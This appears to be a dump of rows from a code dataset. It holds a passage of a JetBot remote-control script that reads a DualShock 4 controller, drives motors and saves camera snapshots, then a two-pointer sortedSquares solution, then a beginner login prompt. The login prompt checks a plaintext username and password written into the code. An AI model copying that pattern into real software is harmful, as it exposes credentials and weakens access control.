    "ABS_RZ": 128,
    "ABS_Z": 128,
    "ABS_Y": 128,
    "ABS_X": 128,
    "ABS_RX": 128,
    "ABS_RY": 128,
    "ABS_HAT0X": 0,
    "ABS_HAT0Y": 0,
    "NN_STEERING": 0,
    "NN_THROTTLE": 0,
}
# Shared runtime state, mutated by the handlers below.
dualshock = None           # evdev InputDevice for the controller
cam = None                 # jetbot Camera instance, created lazily
camproc = None             # remote-camera helper subprocess
nnproc = None              # neural-network helper subprocess
robot = None               # jetbot Robot motor driver
capidx = 0                 # increments on every cam_capture() call
continuouscap = False      # True while continuous capture is active
continuouscaptime = None   # when continuous capture was last toggled
neuralnet_latched = False  # True while NN driving is latched on
def get_dualshock4():
    """Scan all evdev input devices and return the DualShock 4, or None.

    The pad advertises itself with the generic name "Wireless Controller".
    """
    candidates = [evdev.InputDevice(path) for path in evdev.list_devices()]
    for candidate in candidates:
        label = candidate.name.lower().strip()
        if label == "wireless controller":
            return candidate
def gamepad_event_handler(event, is_remotecontrol=True, is_cameracapture=False):
    """Handle a single evdev event from the DualShock 4.

    Axis (EV_ABS) events record the new raw value in the shared ``axis``
    dict.  Key (EV_KEY) presses perform mode-dependent actions:

    * TPAD     - RC mode: unlatch the neural net, make the motors safe,
      and kill both helper processes.
    * PSHOME   - RC mode: re-enable ("make unsafe") the motors.
    * R1       - RC mode: start the camera helper; camera mode: save one
      snapshot.
    * L1       - RC mode: start the camera helper; camera mode: toggle
      continuous capture.
    * TRIANGLE - unlatch neural-net driving (any mode).

    Fix applied: removed an unused ``categorize(event)`` result in the
    EV_KEY branch that was assigned but never read.

    :param event: raw evdev input event
    :param is_remotecontrol: True when running in RC (driving) mode
    :param is_cameracapture: True when running in camera-capture mode
    """
    global axis
    global cam
    global robot
    global continuouscap
    global continuouscaptime
    global neuralnet_latched
    if event.type == ecodes.EV_ABS:
        absevent = categorize(event)
        axiscode = ecodes.bytype[absevent.event.type][absevent.event.code]
        if "ABS_" in axiscode:
            axis[axiscode] = absevent.event.value
        if is_cameracapture and cam == None:
            # NOTE(review): fires on axis motion only while the camera is
            # still uninitialized (cam is None) — confirm intent.
            snapname = get_snap_name(OTHERCODE)
            print("saving single pic: " + snapname)
            cam_capture(snapname)
    if event.type == ecodes.EV_KEY:
        if event.value == KeyEvent.key_down:
            if event.code == TPAD:
                if is_remotecontrol:
                    neuralnet_latched = False
                    try:
                        robot.motors_makeSafe()
                    except Exception:
                        pass
                    end_cam_proc()
                    end_nn_proc()
                elif is_cameracapture:
                    pass
            elif event.code == PSHOME:
                if is_remotecontrol:
                    try:
                        robot.motors_makeUnsafe()
                    except Exception:
                        pass
            elif event.code == R1:
                if is_remotecontrol:
                    start_cam_proc()
                elif is_cameracapture:
                    snapname = get_snap_name(event.code)
                    print("saving single pic: " + snapname)
                    cam_capture(snapname)
            elif event.code == L1:
                if is_remotecontrol:
                    start_cam_proc()
                elif is_cameracapture:
                    continuouscap = not continuouscap
                    continuouscaptime = datetime.datetime.now()
            elif event.code == TRIANGLE:
                neuralnet_latched = False
        elif event.value == KeyEvent.key_up:
            pass
def run(remotecontrol=True, cameracapture=False):
    """Main loop: poll the DualShock 4 and drive the robot or take photos.

    Exactly one of the two flags should be True.

    :param remotecontrol: drive the motors from controller / NN input
    :param cameracapture: save camera snapshots on shutter-button input
    """
    global dualshock
    global robot
    global axis
    global continuouscap
    global continuouscaptime
    global neuralnet_latched
    global nnproc
    prevShutter = False            # previous state of the L1 shutter button
    meaningful_input_time = None   # last time the user gave real input
    neuralnet_input_time = None    # last time the NN helper sent a command
    cam_cap_time = None            # last continuous-capture snapshot time
    last_speed_debug_time = datetime.datetime.now()
    last_tick_debug_time = datetime.datetime.now()
    print("Remote Control script running! ", end=" ")
    if remotecontrol:
        print("in RC mode")
    elif cameracapture:
        print("in CAMERA mode")
    else:
        print("unknown mode, quitting")
        quit()
    if remotecontrol:
        try:
            robot = Robot()
        except Exception as ex:
            sys.stderr.write("Failed to initialize motor drivers, error: %s" % (str(ex)))
            robot = None
    while True:
        # Outer loop: (re)connect to the controller, retrying every 2 s.
        dualshock = get_dualshock4()
        if dualshock != None:
            print("DualShock4 found, %s" % str(dualshock))
        else:
            time.sleep(2)
        now = datetime.datetime.now()
        delta_time = now - last_tick_debug_time
        if delta_time.total_seconds() > 5:
            # Heartbeat so a watching log shows the script is still alive.
            last_tick_debug_time = now
            sys.stderr.write("tick %s" % (str(now)))
        while dualshock != None:
            # Inner loop: handle one event (or one control tick) per pass.
            now = datetime.datetime.now()
            delta_time = now - last_tick_debug_time
            if delta_time.total_seconds() > 5:
                last_tick_debug_time = now
                sys.stderr.write("tick %s" % (str(now)))
            try:
                event = dualshock.read_one()
                if event != None:
                    gamepad_event_handler(event, is_remotecontrol=remotecontrol, is_cameracapture=cameracapture)
                else:
                    # Event queue drained: run the control logic for this tick.
                    time.sleep(0)
                    all_btns = dualshock.active_keys()
                    if remotecontrol:
                        meaningful_input = False # meaningful input means any buttons pressed or the stick has been moved
                        if TRIANGLE in all_btns:
                            neuralnet_latched = False
                        mag_dpad, ang_dpad = axis_vector(axis[DPAD_X], axis[DPAD_Y])
                        mag_left, ang_left = axis_vector(axis_normalize(axis[LEFT_X], curve=0), axis_normalize(axis[LEFT_Y], curve=0))
                        mag_right, ang_right = axis_vector(axis_normalize(axis[RIGHT_X], curve=0), axis_normalize(axis[RIGHT_Y], curve=0))
                        now = datetime.datetime.now()
                        if mag_dpad != 0 or mag_left > 0.1 or mag_right > 0.1:
                            meaningful_input = True
                            if meaningful_input_time == None:
                                print("meaningful input!")
                            meaningful_input_time = now
                        elif meaningful_input_time != None: # user may have let go, check for timeout
                            delta_time = now - meaningful_input_time
                            if delta_time.total_seconds() > 2:
                                print("No meaningful input, stopping robot motors")
                                meaningful_input = False
                                meaningful_input_time = None
                                if robot != None:
                                    robot.stop()
                            else:
                                meaningful_input = True
                        # SQUARE latches NN driving on, TRIANGLE unlatches it,
                        # CROSS enables it only while held.
                        use_nn = False
                        if SQUARE in all_btns:
                            neuralnet_latched = True
                        if TRIANGLE in all_btns:
                            neuralnet_latched = False
                        if neuralnet_latched or CROSS in all_btns:
                            use_nn = True
                        if meaningful_input == False and nnproc is not None: # remote control inputs always override neural net inputs
                            # Drain throttle/steering lines ("TTTSSS...") the NN
                            # helper wrote to our stdin, without blocking.
                            while sys.stdin in select.select([sys.stdin], [], [], 0)[0]:
                                line = sys.stdin.readline()
                                if line:
                                    try:
                                        axis[NN_THROTTLE] = int(line[0:3])
                                        axis[NN_STEERING] = int(line[3:])
                                        neuralnet_input_time = now
                                    except:
                                        pass
                            if neuralnet_input_time != None and use_nn:
                                delta_time = now - neuralnet_input_time
                                if delta_time.total_seconds() < 5:
                                    # Fresh NN commands count as meaningful input.
                                    meaningful_input = True
                                    meaningful_input_time = now
                        if meaningful_input:
                            left_speed = 0
                            right_speed = 0
                            ignore_dpad = False
                            #ignore_rightstick = True
                            if use_nn:
                                start_nn_proc() # this will check if process has already started
                                left_speed, right_speed = axis_mix(axis_normalize(axis[NN_STEERING]), axis_normalize(255 - axis[NN_THROTTLE]))
                            elif mag_dpad != 0 and ignore_dpad == False:
                                # D-pad drive: steering input attenuated to 1/3.
                                left_speed, right_speed = axis_mix(float(axis[DPAD_X]) / 3.0, axis[DPAD_Y])
                            #elif mag_left > mag_right or ignore_rightstick == True:
                            #    left_speed, right_speed = axis_mix(axis_normalize(axis[LEFT_X]), axis_normalize(axis[LEFT_Y]))
                            #    if ignore_rightstick == False:
                            #        left_speed /= 2
                            #        right_speed /= 2
                            else:
                                # left_speed, right_speed = axis_mix(axis_normalize(axis[RIGHT_X]), axis_normalize(axis[RIGHT_Y]))
                                left_speed, right_speed = axis_mix(axis_normalize(axis[RIGHT_X]), axis_normalize(axis[LEFT_Y]))
                            if robot != None:
                                robot.set_motors(left_speed, right_speed)
                            delta_time = now - last_speed_debug_time
                            if delta_time.total_seconds() >= 1:
                                # Report motor speeds at most once per second.
                                if use_nn:
                                    print("nn -> ", end="")
                                print("leftmotor: %.2f rightmotor: %.2f" % (left_speed, right_speed))
                                last_speed_debug_time = now
                    elif cameracapture:
                        now = datetime.datetime.now()
                        need_cap = False
                        if L1 in all_btns:
                            if prevShutter == False:
                                # Rising edge of L1 toggles continuous capture,
                                # debounced to one toggle per 0.5 s.
                                if continuouscaptime != None:
                                    timedelta = now - continuouscaptime
                                    if timedelta.total_seconds() > 0.5:
                                        continuouscap = not continuouscap
                                else:
                                    continuouscap = not continuouscap
                            prevShutter = True
                        else:
                            prevShutter = False
                        if continuouscap:
                            cam_cap_time = now
                            need_cap = L1
                        else:
                            if cam_cap_time != None:
                                timedelta = now - cam_cap_time
                                if timedelta.total_seconds() < 1:
                                    #need_cap = OTHERCODE
                                    pass
                                else:
                                    cam_cap_time = None
                        if need_cap != False:
                            snapname = get_snap_name(need_cap)
                            print("saving running pic: " + snapname)
                            cam_capture(snapname)
                            cam_frame_time = now
                            while True:
                                # Wait 10 ms after each capture while still
                                # servicing controller events.
                                now = datetime.datetime.now()
                                cam_frame_timedelta = now - cam_frame_time
                                if cam_frame_timedelta.total_seconds() >= 0.01:
                                    break
                                event = dualshock.read_one()
                                if event != None:
                                    gamepad_event_handler(event, is_remotecontrol=False, is_cameracapture=True)
            except OSError:
                # Controller vanished (battery died / out of range): stop
                # everything and fall back to the reconnect loop.
                print("DualShock4 disconnected")
                dualshock = None
                if remotecontrol:
                    end_cam_proc()
                    if robot != None:
                        robot.stop()
def axis_normalize(v, curve=1.8, deadzone_inner=16, deadzone_outer=16):
    """Map a raw 0-255 stick reading to [-1.0, 1.0].

    Applies an inner and outer deadzone and, when ``curve`` is non-zero,
    an exponential response curve so small deflections give fine control.

    :param v: raw axis value, 0..255
    :param curve: exponent of the response curve (0 for linear)
    :param deadzone_inner: dead counts around the centre
    :param deadzone_outer: dead counts near the ends of travel
    :return: normalized value in [-1.0, 1.0]
    """
    full_scale = 255
    midpoint = full_scale / 2.0
    sign = 1
    if v < midpoint:
        # Mirror the lower half onto the upper half and remember the sign.
        sign = -1
        v = full_scale - v
    v -= midpoint + deadzone_inner
    span = full_scale - deadzone_outer
    span -= midpoint + deadzone_inner
    v = v / span
    if curve != 0:
        v = (math.exp(v * curve) - math.exp(0)) / (math.exp(curve) - math.exp(0))
    if v < 0.0:
        return 0 * sign
    if v > 1.0:
        return 1.0 * sign
    return v * sign
def axis_mix(x, y):
    """Mix a stick deflection into differential-drive motor speeds.

    :param x: steering component, -1..1 (positive steers right)
    :param y: throttle component, -1..1 (raw stick Y, so negative is up)
    :return: (left, right) speeds, each clamped to [-1.0, 1.0]
    """
    forward = -y  # stick Y axis is inverted
    left = max(-1.0, min(1.0, forward + x))
    right = max(-1.0, min(1.0, forward - x))
    return left, right
def axis_vector(x, y, maglim=2.0):
    """Convert a stick deflection to polar form.

    :param x: horizontal component
    :param y: vertical component (raw stick convention, negative is up)
    :param maglim: ceiling applied to the magnitude
    :return: (magnitude, angle in degrees, 0 = straight up)
    """
    y = -y  # stick Y axis is inverted
    magnitude = math.sqrt((x * x) + (y * y))
    # atan2 args deliberately swapped so 0 degrees points "up" (forward).
    angle = math.degrees(math.atan2(x, y))
    if magnitude > maglim:
        magnitude = maglim
    return magnitude, angle
def flip_axis(x):
    """Mirror a raw 0-255 axis value around its midpoint."""
    inverted = 255 - x
    return inverted
def cam_capture(fn):
    """Capture one camera frame and save it as ``<fn>.jpg``.

    Files go to /home/jetbot/camerasnaps, which is created on demand.
    The camera is initialized lazily on first use.  Best-effort: every
    failure is reported (stdout/stderr) but never raised to the caller.

    Fixes applied: ``is None`` instead of ``== None``; the race-prone
    "create then catch FileExistsError" replaced with ``exist_ok=True``;
    ``fp`` is built outside the try so the final except can't see it
    unbound.

    :param fn: snapshot file name, without extension
    """
    global cam
    global capidx
    capidx += 1
    path = "/home/jetbot/camerasnaps"
    try:
        os.makedirs(path, exist_ok=True)
    except Exception as ex:
        print("Exception creating directory '%s', error: %s" % (path, str(ex)))
        return
    if cam is None:
        try:
            print("Initializing camera...")
            cam = Camera.instance(width=960, height=720)
            print("\r\nCamera initialized!")
        except Exception as ex:
            sys.stderr.write("Exception initializing camera: " + str(ex))
            cam = None
            return
    fp = os.path.join(path, fn + '.jpg')
    try:
        with open(fp, 'wb') as f:
            f.write(bytes(imencode('.jpg', cam.value)[1]))
        # presumably signals the capture via the camera LED — TODO confirm
        # teensyadc semantics
        teensyadc.set_camera_led()
        try:
            # Hand the file back to the jetbot user so it can be managed
            # without root.
            uid = pwd.getpwnam("jetbot").pw_uid
            gid = grp.getgrnam("jetbot").gr_gid
            os.chown(fp, uid, gid)
        except Exception as ex:
            sys.stderr.write("Exception changing ownership of file '%s', error: %s" % (fp, str(ex)))
    except Exception as ex:
        sys.stderr.write("Exception writing to file '%s', error: %s" % (fp, str(ex)))
def get_snap_name(initiating_key=None):
    """Build a snapshot file name encoding timestamp and controller state.

    The name starts with YYYYMMDDhhmmss_<capture index> and, best-effort,
    appends throttle/steering bytes, a held-button bitmask (hex) and
    (magnitude, angle) pairs for the d-pad, left stick and right stick.
    Any failure while reading the pad simply truncates the name.

    :param initiating_key: evdev key code of the button that triggered
        the snapshot; OR'd into the bitmask even if already released
    :return: file name without extension
    """
    global dualshock
    global capidx
    global axis
    now = datetime.datetime.now()
    keybitmap = 0
    try:
        # Fold every currently held button into a bitmask; DS4 key codes
        # start at 304, so bit 0 is SQUARE (304).
        all_btns = dualshock.active_keys()
        for b in all_btns:
            bb = b - 304
            keybitmap |= 1 << bb
    except:
        pass
    if initiating_key != None:
        bb = initiating_key - 304
        keybitmap |= 1 << bb
    name = "%04u%02u%02u%02u%02u%02u_%08u" % (now.year, now.month, now.day, now.hour, now.minute, now.second, capidx)
    try:
        # Throttle (left Y, flipped so forward is positive) and steering
        # (right X), each mapped onto 0..254 around a 127 centre.
        name += "_%03u%03u" % (int(round(axis_normalize(flip_axis(axis[LEFT_Y])) * 127.0)) + 127, int(round(axis_normalize(axis[RIGHT_X]) * 127.0)) + 127)
        name += "_%08X" % keybitmap
        mag, ang = axis_vector(axis[DPAD_X], axis[DPAD_Y])
        if ang < 0:
            ang = 360 + ang  # wrap negative angles into 0..360
        name += "_%03u%03u" % (round(mag * 100.0), round(ang))
        mag, ang = axis_vector(axis_normalize(axis[LEFT_X]), axis_normalize(axis[LEFT_Y]), maglim=1.0)
        if ang < 0:
            ang = 360 + ang
        name += "_%03u%03u" % (round(mag * 100.0), round(ang))
        mag, ang = axis_vector(axis_normalize(axis[RIGHT_X]), axis_normalize(axis[RIGHT_Y]), maglim=1.0)
        if ang < 0:
            ang = 360 + ang
        name += "_%03u%03u" % (round(mag * 100.0), round(ang))
    except Exception as ex:
        sys.stderr.write("Exception while generating snap name: " + str(ex))
    return name
def start_cam_proc():
    """Spawn the remote-camera helper process; no-op if already running.

    Our PID is passed on the command line so the helper can watch us.
    """
    global camproc
    if camproc is not None:
        return
    print("starting camera process...", end=" ")
    cmd = ['python3', '/home/jetbot/jetbot/jetbot/apps/remotecamera.py', str(os.getpid())]
    camproc = subprocess.Popen(cmd)
    print(" done!")
def end_cam_proc():
    """Kill the remote-camera helper process, if one is running."""
    global camproc
    if camproc is not None:
        try:
            camproc.kill()
            camproc = None
        except Exception as ex:
            sys.stderr.write("Exception while trying to kill camera process: " + str(ex))
        finally:
            print("ended camera process")
def set_camera_instance(c):
    """Install an externally created Camera object as the shared instance."""
    global cam
    cam = c


def get_camera_instance():
    """Return the shared Camera object (None until one is set or created)."""
    return cam
def start_nn_proc():
    """Spawn the neural-network helper process; no-op if already running.

    Our PID is passed on the command line so the helper can watch us.
    """
    global nnproc
    if nnproc is not None:
        return
    print("starting neuralnetwork process...", end=" ")
    cmd = ['python3', '/home/jetbot/jetbot/jetbot/apps/neuralnetwork.py', str(os.getpid())]
    nnproc = subprocess.Popen(cmd)
    print(" done!")
def end_nn_proc():
    """Kill the neural-network helper process, if one is running."""
    global nnproc
    if nnproc is not None:
        try:
            nnproc.kill()
            nnproc = None
        except Exception as ex:
            sys.stderr.write("Exception while trying to kill neuralnetwork process: " + str(ex))
        finally:
            print("ended neuralnetwork process")
if __name__ == '__main__':
    # Default entry point: remote-control (driving) mode.
    run()
|
class Solution(object):
    def sortedSquares(self, nums):
        """Return the squares of a sorted list, in non-decreasing order.

        Two-pointer scan: the largest absolute value always sits at one
        of the two ends of the sorted input, so the output can be filled
        from its last slot downwards in O(n).

        :type nums: List[int]
        :rtype: List[int]
        """
        out = [0] * len(nums)
        lo, hi = 0, len(nums) - 1
        for pos in range(len(nums) - 1, -1, -1):
            if abs(nums[lo]) < abs(nums[hi]):
                out[pos] = nums[hi] ** 2
                hi -= 1
            else:
                out[pos] = nums[lo] ** 2
                lo += 1
        return out
# Demo: square a sorted sample list and print the sorted result.
numbers = [-7, -3, 2, 3, 11]
obj = Solution()
result = obj.sortedSquares(numbers)
print(result)
|
# Simple three-attempt login prompt.
#
# Fixes applied to the original:
#  * the loop condition `username == username and password == password`
#    was a tautology — replaced with `while True`;
#  * credentials are now validated BEFORE the attempt limit is checked,
#    so the third (last) entry is actually verified instead of being
#    read and then discarded by the `count == 3` break.
print('Enter correct username and password combo to continue')
username = input("enter username")
password = input("enter the password")
count = 1  # the prompts above consumed the first attempt
while True:
    if username == 'focusit' and password == 'adisir':
        print("Welcome! ")
        break
    if count == 3:
        print("\nThree Username and Password Attempts used. Goodbye")
        break
    # Diagnose which part of the combo was wrong before re-prompting.
    if username != 'focusit' and password != 'adisir':
        print("Your Username and Password is wrong!")
    elif username == 'focusit':
        print("Your Password is wrong!")
    else:
        print("Your Username is wrong!")
    username = input("\n\nUsername: ")
    password = input("Password: ")
    count += 1
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.